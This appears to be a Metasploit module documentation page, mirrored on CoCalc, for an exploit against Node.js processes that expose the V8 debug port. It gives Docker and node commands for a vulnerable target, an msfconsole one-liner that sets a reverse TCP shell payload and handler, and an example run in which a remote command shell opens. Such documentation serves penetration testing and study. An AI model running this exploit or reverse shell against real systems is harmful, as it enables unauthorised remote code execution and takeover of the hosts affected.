CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md
Views: 1904

Vulnerable Application

Current and historical versions of node (or any JS env based on the V8 JS engine) have this functionality and could be exploitable if configured to expose the JS port on an untrusted interface.

Install a version of node using any of the normal methods:

Alternately, use standard node docker containers as targets:

$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858

(Others at https://hub.docker.com/_/node/)

Tested on Node 7.x, 6.x, 4.x

Verification Steps

  1. Run a node process exposing the debug port

node --debug=0.0.0.0:5858

  1. Exploit it and catch the callback:

msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit

(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)

Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.

Scenarios

Example Run (Node 7.x)

Victim:

$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)

Attacker:

msf exploit(nodejs_v8_debugger) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700

id
(redacted)